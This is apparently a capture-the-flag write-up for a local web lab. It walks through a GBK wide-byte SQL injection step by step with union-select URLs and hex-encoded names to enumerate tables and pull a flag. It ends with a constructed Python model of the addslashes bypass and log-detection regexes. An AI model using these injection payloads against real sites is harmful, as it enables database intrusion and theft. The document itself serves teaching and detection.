URL: http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' and 1=1 --+    no error
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' order by 2 --+    no error
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,2 --+    column 2 is echoed on the page
The following query retrieves the current user, the database version, the current database and so on: http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,user() --+
User: root@localhost, database version: 5.5.53, current database: webug_width_byte
List the tables in webug_width_byte: http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug_width_byte' --+    error
The error is because the quotes are escaped, so the database name is converted to hex instead (a hex literal is evaluated directly by MySQL as a string, so no quotes are needed and nothing gets escaped): http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x77656275675F77696474685F62797465 --+
Tables: sqlinjection, storage_xss. Query the columns of sqlinjection: http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x73716C696E6A656374696F6E --+
It turns out the flag is not in the webug_width_byte database at all (ouch), so back to the webug database to look for it properly.
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7765627567 --+    webug = 0x7765627567
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656E765F6C697374 --+    env_list = 0x656E765F6C697374
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df' union select 1,envFlag from webug.env_list where id=6 --+    the flag is in the row with id=6
Flag: dfsadfsadfas
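Added example (not from the original write-up): a Python model of why the %df prefix defeats addslashes()-style escaping when the MySQL connection charset is GBK but not when it is UTF-8, plus a log check for the two request patterns this lab produces (a lead byte directly before a quote, and hex string literals in place of quoted strings). The addslashes() model, the sample log lines and the regexes are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes


def addslashes(raw: bytes) -> bytes:
    """Byte-level model of PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives_escaping(raw: bytes, connection_charset: str) -> bool:
    """True if a bare ' reaches the SQL parser after escaping.

    Under GBK the byte pair \\xdf\\x5c is one character, so the backslash that
    addslashes() inserted is swallowed and the quote terminates the string.
    Under UTF-8 \\xdf\\x5c is not a valid sequence, the backslash stays, and the
    quote remains escaped: this is why fixing the connection charset (and using
    prepared statements) closes the hole.
    """
    text = addslashes(raw).decode(connection_charset, errors="replace")
    return re.search(r"(?<!\\)'", text) is not None


# Constructed access-log lines modelled on the requests in this write-up.
SAMPLE_LOG = [
    "GET /control/sqlinject/width_byte_injection.php?id=1 200",
    "GET /control/sqlinject/width_byte_injection.php?id=1%df'%20and%201=1%20--+ 200",
    "GET /control/sqlinject/width_byte_injection.php?id=1%df%27%20union%20select%201,"
    "group_concat(table_name)%20from%20information_schema.tables%20where%20"
    "table_schema=0x7765627567%20--+ 200",
]

# Heuristics: a GBK lead byte immediately before a quote, and a long hex literal.
WIDE_BYTE_QUOTE = re.compile(rb"[\x81-\xfe]'")
HEX_STRING_LITERAL = re.compile(rb"0x[0-9a-fA-F]{6,}")


def flag_requests(lines):
    """Return (line, reasons) for log lines matching either heuristic."""
    hits = []
    for line in lines:
        query = line.split(" ", 2)[1].partition("?")[2]
        decoded = unquote_to_bytes(query)  # inspect the bytes the app would see
        reasons = []
        if WIDE_BYTE_QUOTE.search(decoded):
            reasons.append("wide-byte quote")
        if HEX_STRING_LITERAL.search(decoded):
            reasons.append("hex string literal")
        if reasons:
            hits.append((line, reasons))
    return hits
```

The wide-byte heuristic will also match legitimate multibyte text followed by an apostrophe, so treat it as a triage signal rather than a block rule.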